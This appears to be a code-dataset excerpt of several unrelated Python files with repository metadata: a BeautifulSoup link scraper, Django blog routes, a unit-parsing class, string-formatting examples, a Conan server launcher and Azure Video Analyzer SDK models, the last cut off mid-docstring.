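# "class xcen ycen w h", with all values normalized to [0, 1]. Worked example:
# for a width=100, height=80 image, the row "0 0.5 0.5 0.2 0.25" denormalizes
# to xmin=40, ymin=30, xmax=60, ymax=50.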
18.488189
77
0.559199
0
0
0
0
0
0
0
0
382
0.162692
4c49c1d6c63daaf7fca0ba56abe4608634b5eea3
371
py
Python
myBeautifulSoup.py
ZhongXinWang/python
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
[ "Apache-2.0" ]
null
null
null
myBeautifulSoup.py
ZhongXinWang/python
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
[ "Apache-2.0" ]
null
null
null
myBeautifulSoup.py
ZhongXinWang/python
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com'
with requests.get(url) as r:
    r.encoding = 'utf-8'
    # name an explicit parser so bs4 does not warn and parsing is stable
    soup = BeautifulSoup(r.text, 'html.parser')
    # pretty-print the parsed document
    pret = soup.prettify()
    u = soup.select('#u1 a')
    for i in u:
        print("Name: %s, URL: %s" % (i.getText(), i.get('href')))
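
# Editor's note (added): the CSS selector '#u1 a' matches every <a> element
# nested under the element with id="u1"; getText() and get('href') then pull
# each link's label and target URL.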
24.733333
52
0.660377
0
0
0
0
0
0
0
0
140
0.361757
4c4aaf6acc32d2b6cfe7656b0adf41a02eba514c
869
py
Python
blogsNewsModule/urls.py
adityakekare/NewsAPIDjango
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
[ "MIT" ]
1
2020-10-14T17:13:45.000Z
2020-10-14T17:13:45.000Z
blogsNewsModule/urls.py
adityakekare/NewsAPIDjango
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
[ "MIT" ]
null
null
null
blogsNewsModule/urls.py
adityakekare/NewsAPIDjango
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
[ "MIT" ]
null
null
null
from django.urls import path, include from . import views urlpatterns = [ path("", views.newsView, name="home"), path("createBlog", views.CreateBlogView.as_view(), name="createBlog"), path("myBlogs", views.PostListView.as_view(), name="myBlogs"), path("single/<int:pk>", views.PostDetailView.as_view(), name="single"), path("subscribe", views.subscribeView,name="subscribe"), path("about", views.aboutView, name="about"), path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"), path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"), path("like/<int:pk>", views.LikeView, name="like_post"), # API urls for superuser path("api/create/", views.APICreateView.as_view()), path("api/posts/", views.APIListView.as_view()), path("api/posts/<int:pk>", views.APIDetailView.as_view()), ]
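
# Editor's note (added; signatures are illustrative): the <int:pk> converter
# passes the captured URL segment as an integer keyword argument, so a
# function-based view such as LikeView is expected to look like
#
#     def LikeView(request, pk): ...
#
# while the class-based views above receive it via self.kwargs['pk'].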
41.380952
75
0.667434
0
0
0
0
0
0
0
0
252
0.289988
4c4ab4331dee2d296afdfa6d9310db62fe1c4c93
3,133
py
Python
unitClass.py
MatthewZheng/UnitsPlease
5911267b5a0a78dd4d833c6be46e89caaf98c200
[ "MIT" ]
null
null
null
unitClass.py
MatthewZheng/UnitsPlease
5911267b5a0a78dd4d833c6be46e89caaf98c200
[ "MIT" ]
null
null
null
unitClass.py
MatthewZheng/UnitsPlease
5911267b5a0a78dd4d833c6be46e89caaf98c200
[ "MIT" ]
null
null
null
#!/usr/bin/python

_author_ = "Matthew Zheng"
_purpose_ = "Sets up the unit class"

class Unit:
    '''This is a class of lists'''
    def __init__(self):
        self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"]
        self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"]

    def baseCheck(self, userList):
        '''Converts elements in str list to base units'''
        converted = []
        for i in (userList):
            isSquared = False
            unitPreIndex = ""
            #checks if it has a caret in the expression
            for ind, j in enumerate(list(i)):
                if j == "^":
                    isSquared = True
                    unitPreIndex = ''.join(list(i)[:ind])
                    break
            #converts non-unary unit to base unit and checks for squared variables
            #note: membership must be tested against each list explicitly;
            #the original `x in (a or b)` only ever checked the first list
            while(i not in self.baseUnits and i not in self.derivedUnits
                  and len(list(i)) != 1
                  and unitPreIndex not in self.baseUnits
                  and unitPreIndex not in self.derivedUnits
                  and len(unitPreIndex) != 1):
                orgNameList = list(i)
                #identify prefix removed
                self.idPrefix = orgNameList.pop(0)
                i = ''.join(orgNameList)
                print("The program removed the prefix %s and converted your unit to its base unit: %s." % (self.idPrefix, i))
                #checks if it is a special unit
                if(i not in self.baseUnits and i not in self.derivedUnits):
                    #append in case for special units
                    break
                else:
                    #append in case for base unit
                    break
            #Appends base unit
            if((i in self.baseUnits or i in self.derivedUnits) and isSquared == False):
                converted.append(i)
            elif(isSquared == True):
                toAppend = []
                numReps = []
                #run once to get number of times the unit is squared
                for index, val in enumerate(list(i)):
                    if val == "^":
                        numStart = index+1
                        numReps.append(''.join(list(i)[numStart:]))
                        toAppend.append(''.join(list(i)[:index]))
                        break
                #convert numReps into an int
                intReps = int(''.join(numReps))
                #append number of units specified by the caret
                for l in range (intReps):
                    if(''.join(toAppend) not in self.baseUnits and ''.join(toAppend) not in self.derivedUnits):
                        print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend))
                    converted.append(''.join(toAppend))
            #Exception for special units
            else:
                print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i)
                converted.append(i)
        return(converted)
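
if __name__ == "__main__":
    # Editor's usage sketch (added): 'km' has its metric prefix stripped down
    # to the base unit 'm', and 'm^2' expands into two 'm' factors.
    print(Unit().baseCheck(["km", "m^2"]))  # -> ['m', 'm', 'm']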
42.917808
192
0.509416
3,050
0.973197
0
0
0
0
0
0
1,033
0.329611
4c4be3eb705a80e6147920908a86da5673e90f59
918
py
Python
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
1
2021-02-27T18:35:39.000Z
2021-02-27T18:35:39.000Z
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Wed Feb 26 22:23:07 2020 @author: Neal LONG Try to construct URL with string.format """ base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}" stock = "000002" api_type = 'cp' print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) stock = "00002" print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) print('='*40) print('{:>6}'.format('236')) print('{:>06}'.format('236')) print("Every {} should know the use of {}-{} programming and {}" .format("programmer", "Open", "Source", "Operating Systems")) print("Every {3} should know the use of {2}-{1} programming and {0}" .format("programmer", "Open", "Source", "Operating Systems"))
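
# Editor's aside (added): the pieces of the format spec used above, in one
# place -- '>' right-aligns within the field, the '0' sets the fill character,
# and the trailing digit is the minimum field width.
assert '{:>6}'.format('236') == '   236'
assert '{:>06}'.format('236') == '000236'
assert base_url.format('2', 'cp').endswith('gszl_000002.html?type=cp')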
27
80
0.623094
0
0
0
0
0
0
0
0
571
0.622004
4c4da9a43e106d41a3befb2cd7c5b3dab87492dd
274
py
Python
conans/server/server_launcher.py
Wonders11/conan
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
[ "MIT" ]
6,205
2015-12-01T13:40:05.000Z
2022-03-31T07:30:25.000Z
conans/server/server_launcher.py
Wonders11/conan
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
[ "MIT" ]
8,747
2015-12-01T16:28:48.000Z
2022-03-31T23:34:53.000Z
conans/server/server_launcher.py
Mattlk13/conan
005fc53485557b0a570bb71670f2ca9c66082165
[ "MIT" ]
961
2015-12-01T16:56:43.000Z
2022-03-31T13:50:52.000Z
from conans.server.launcher import ServerLauncher from conans.util.env_reader import get_env launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME")) app = launcher.server.root_app def main(*args): launcher.launch() if __name__ == "__main__": main()
18.266667
66
0.762774
0
0
0
0
0
0
0
0
29
0.105839
4c4dd7e5ec767d2a5876ed8c611d8ac4661dfd09
153,586
py
Python
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
praveenkuttappan/azure-sdk-for-python
4b79413667b7539750a6c7dde15737013a3d4bd5
[ "MIT" ]
2,728
2015-01-09T10:19:32.000Z
2022-03-31T14:50:33.000Z
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
v-xuto/azure-sdk-for-python
9c6296d22094c5ede410bc83749e8df8694ccacc
[ "MIT" ]
17,773
2015-01-05T15:57:17.000Z
2022-03-31T23:50:25.000Z
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
v-xuto/azure-sdk-for-python
9c6296d22094c5ede410bc83749e8df8694ccacc
[ "MIT" ]
1,916
2015-01-19T05:05:41.000Z
2022-03-31T19:36:44.000Z
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from azure.core.exceptions import HttpResponseError import msrest.serialization class Resource(msrest.serialization.Model): """Common fields that are returned in the response for all Azure Resource Manager resources. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, } def __init__( self, **kwargs ): super(Resource, self).__init__(**kwargs) self.id = None self.name = None self.type = None self.system_data = None class ProxyResource(Resource): """The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, } def __init__( self, **kwargs ): super(ProxyResource, self).__init__(**kwargs) class AccessPolicyEntity(ProxyResource): """Access policies help define the authentication rules, and control access to specific video resources. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. 
:vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param role: Defines the access level granted by this policy. Possible values include: "Reader". :type role: str or ~video_analyzer.models.AccessPolicyRole :param authentication: Authentication method to be used when validating client API access. :type authentication: ~video_analyzer.models.AuthenticationBase """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'role': {'key': 'properties.role', 'type': 'str'}, 'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'}, } def __init__( self, **kwargs ): super(AccessPolicyEntity, self).__init__(**kwargs) self.role = kwargs.get('role', None) self.authentication = kwargs.get('authentication', None) class AccessPolicyEntityCollection(msrest.serialization.Model): """A collection of AccessPolicyEntity items. :param value: A collection of AccessPolicyEntity items. :type value: list[~video_analyzer.models.AccessPolicyEntity] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[AccessPolicyEntity]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(AccessPolicyEntityCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class AccountEncryption(msrest.serialization.Model): """Defines how the Video Analyzer account is (optionally) encrypted. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param type: Required. The type of key used to encrypt the Account Key. Possible values include: "SystemKey", "CustomerKey". :type type: str or ~video_analyzer.models.AccountEncryptionKeyType :param key_vault_properties: The properties of the key used to encrypt the account. :type key_vault_properties: ~video_analyzer.models.KeyVaultProperties :param identity: The Key Vault identity. :type identity: ~video_analyzer.models.ResourceIdentity :ivar status: The current status of the Key Vault mapping. :vartype status: str """ _validation = { 'type': {'required': True}, 'status': {'readonly': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'}, 'identity': {'key': 'identity', 'type': 'ResourceIdentity'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(AccountEncryption, self).__init__(**kwargs) self.type = kwargs['type'] self.key_vault_properties = kwargs.get('key_vault_properties', None) self.identity = kwargs.get('identity', None) self.status = None class AudioEncoderBase(msrest.serialization.Model): """Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed. 
You probably want to use the sub-classes and not this class directly. Known sub-classes are: AudioEncoderAac. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded (2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160, 192, 224, and 256. If omitted, the bitrate of the input audio is used. :type bitrate_kbps: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'} } def __init__( self, **kwargs ): super(AudioEncoderBase, self).__init__(**kwargs) self.type = None # type: Optional[str] self.bitrate_kbps = kwargs.get('bitrate_kbps', None) class AudioEncoderAac(AudioEncoderBase): """A custom preset for encoding audio with the AAC codec. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded (2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160, 192, 224, and 256. If omitted, the bitrate of the input audio is used. :type bitrate_kbps: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'}, } def __init__( self, **kwargs ): super(AudioEncoderAac, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str class AuthenticationBase(msrest.serialization.Model): """Base class for access policies authentication methods. You probably want to use the sub-classes and not this class directly. Known sub-classes are: JwtAuthentication. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'} } def __init__( self, **kwargs ): super(AuthenticationBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class CertificateSource(msrest.serialization.Model): """Base class for certificate sources. You probably want to use the sub-classes and not this class directly. Known sub-classes are: PemCertificateList. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'} } def __init__( self, **kwargs ): super(CertificateSource, self).__init__(**kwargs) self.type = None # type: Optional[str] class CheckNameAvailabilityRequest(msrest.serialization.Model): """The check availability request body. :param name: The name of the resource for which availability needs to be checked. :type name: str :param type: The resource type. 
:type type: str """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__( self, **kwargs ): super(CheckNameAvailabilityRequest, self).__init__(**kwargs) self.name = kwargs.get('name', None) self.type = kwargs.get('type', None) class CheckNameAvailabilityResponse(msrest.serialization.Model): """The check availability result. :param name_available: Indicates if the resource name is available. :type name_available: bool :param reason: The reason why the given name is not available. Possible values include: "Invalid", "AlreadyExists". :type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason :param message: Detailed reason why the given name is available. :type message: str """ _attribute_map = { 'name_available': {'key': 'nameAvailable', 'type': 'bool'}, 'reason': {'key': 'reason', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, } def __init__( self, **kwargs ): super(CheckNameAvailabilityResponse, self).__init__(**kwargs) self.name_available = kwargs.get('name_available', None) self.reason = kwargs.get('reason', None) self.message = kwargs.get('message', None) class CredentialsBase(msrest.serialization.Model): """Base class for credential objects. You probably want to use the sub-classes and not this class directly. Known sub-classes are: UsernamePasswordCredentials. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'} } def __init__( self, **kwargs ): super(CredentialsBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class TokenKey(msrest.serialization.Model): """Key properties for JWT token validation. You probably want to use the sub-classes and not this class directly. Known sub-classes are: EccTokenKey, RsaTokenKey. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param kid: Required. JWT token key id. Validation keys are looked up based on the key id present on the JWT token header. :type kid: str """ _validation = { 'type': {'required': True}, 'kid': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'kid': {'key': 'kid', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'} } def __init__( self, **kwargs ): super(TokenKey, self).__init__(**kwargs) self.type = None # type: Optional[str] self.kid = kwargs['kid'] class EccTokenKey(TokenKey): """Required validation properties for tokens generated with Elliptical Curve algorithm. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param kid: Required. JWT token key id. Validation keys are looked up based on the key id present on the JWT token header. :type kid: str :param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible values include: "ES256", "ES384", "ES512". :type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo :param x: Required. X coordinate. :type x: str :param y: Required. 
Y coordinate. :type y: str """ _validation = { 'type': {'required': True}, 'kid': {'required': True}, 'alg': {'required': True}, 'x': {'required': True}, 'y': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'kid': {'key': 'kid', 'type': 'str'}, 'alg': {'key': 'alg', 'type': 'str'}, 'x': {'key': 'x', 'type': 'str'}, 'y': {'key': 'y', 'type': 'str'}, } def __init__( self, **kwargs ): super(EccTokenKey, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str self.alg = kwargs['alg'] self.x = kwargs['x'] self.y = kwargs['y'] class EdgeModuleEntity(ProxyResource): """The representation of an edge module. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module. :vartype edge_module_id: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'edge_module_id': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'}, } def __init__( self, **kwargs ): super(EdgeModuleEntity, self).__init__(**kwargs) self.edge_module_id = None class EdgeModuleEntityCollection(msrest.serialization.Model): """A collection of EdgeModuleEntity items. :param value: A collection of EdgeModuleEntity items. :type value: list[~video_analyzer.models.EdgeModuleEntity] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[EdgeModuleEntity]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(EdgeModuleEntityCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class EdgeModuleProvisioningToken(msrest.serialization.Model): """Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset. Variables are only populated by the server, and will be ignored when sending a request. :ivar expiration_date: The expiration date of the registration token. 
The Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to the token expiration date. :vartype expiration_date: ~datetime.datetime :ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through the Azure IoT Edge module twin properties. :vartype token: str """ _validation = { 'expiration_date': {'readonly': True}, 'token': {'readonly': True}, } _attribute_map = { 'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'}, 'token': {'key': 'token', 'type': 'str'}, } def __init__( self, **kwargs ): super(EdgeModuleProvisioningToken, self).__init__(**kwargs) self.expiration_date = None self.token = None class EncoderPresetBase(msrest.serialization.Model): """Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed. You probably want to use the sub-classes and not this class directly. Known sub-classes are: EncoderCustomPreset, EncoderSystemPreset. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'} } def __init__( self, **kwargs ): super(EncoderPresetBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class EncoderCustomPreset(EncoderPresetBase): """Describes a custom preset for encoding the input content using the encoder processor. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param audio_encoder: Describes a custom preset for encoding audio. :type audio_encoder: ~video_analyzer.models.AudioEncoderBase :param video_encoder: Describes a custom preset for encoding video. :type video_encoder: ~video_analyzer.models.VideoEncoderBase """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'}, 'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'}, } def __init__( self, **kwargs ): super(EncoderCustomPreset, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str self.audio_encoder = kwargs.get('audio_encoder', None) self.video_encoder = kwargs.get('video_encoder', None) class NodeBase(msrest.serialization.Model): """Base class for nodes. You probably want to use the sub-classes and not this class directly. Known sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. 
:type name: str """ _validation = { 'type': {'required': True}, 'name': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'} } def __init__( self, **kwargs ): super(NodeBase, self).__init__(**kwargs) self.type = None # type: Optional[str] self.name = kwargs['name'] class ProcessorNodeBase(NodeBase): """Base class for topology processor nodes. You probably want to use the sub-classes and not this class directly. Known sub-classes are: EncoderProcessor. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param inputs: Required. An array of upstream node references within the topology to be used as inputs for this node. :type inputs: list[~video_analyzer.models.NodeInput] """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'inputs': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'inputs': {'key': 'inputs', 'type': '[NodeInput]'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'} } def __init__( self, **kwargs ): super(ProcessorNodeBase, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str self.inputs = kwargs['inputs'] class EncoderProcessor(ProcessorNodeBase): """Encoder processor allows for encoding of the input content. For example, it can be used to change the resolution from 4K to 1280x720. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param inputs: Required. An array of upstream node references within the topology to be used as inputs for this node. :type inputs: list[~video_analyzer.models.NodeInput] :param preset: Required. The encoder preset, which defines the recipe or instructions on how the input content should be processed. :type preset: ~video_analyzer.models.EncoderPresetBase """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'inputs': {'required': True}, 'preset': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'inputs': {'key': 'inputs', 'type': '[NodeInput]'}, 'preset': {'key': 'preset', 'type': 'EncoderPresetBase'}, } def __init__( self, **kwargs ): super(EncoderProcessor, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str self.preset = kwargs['preset']
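# Illustrative sketch (not part of the generated models): wiring an encoder
# processor to a hypothetical upstream node using a built-in system preset.
# The node names are placeholders; 'SingleLayer_720p_H264_AAC' is one of the
# preset names documented on EncoderSystemPreset below. Names used here that
# are defined later in this module resolve at call time.
def _example_encoder_processor():
    """Return a sample EncoderProcessor that re-encodes input to 720p H.264/AAC."""
    return EncoderProcessor(
        name='encoderProcessor',
        inputs=[NodeInput(node_name='rtspSource')],
        preset=EncoderSystemPreset(name='SingleLayer_720p_H264_AAC'),
    )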
class EncoderSystemPreset(EncoderPresetBase): """Describes a built-in preset for encoding the input content using the encoder processor. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Name of the built-in encoding preset. Possible values include: "SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC", "SingleLayer_2160p_H264_AAC". :type name: str or ~video_analyzer.models.EncoderSystemPresetType """ _validation = { 'type': {'required': True}, 'name': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, } def __init__( self, **kwargs ): super(EncoderSystemPreset, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str self.name = kwargs['name'] class Endpoint(msrest.serialization.Model): """The endpoint details. All required parameters must be populated in order to send to Azure. :param endpoint_url: The URL of the endpoint. :type 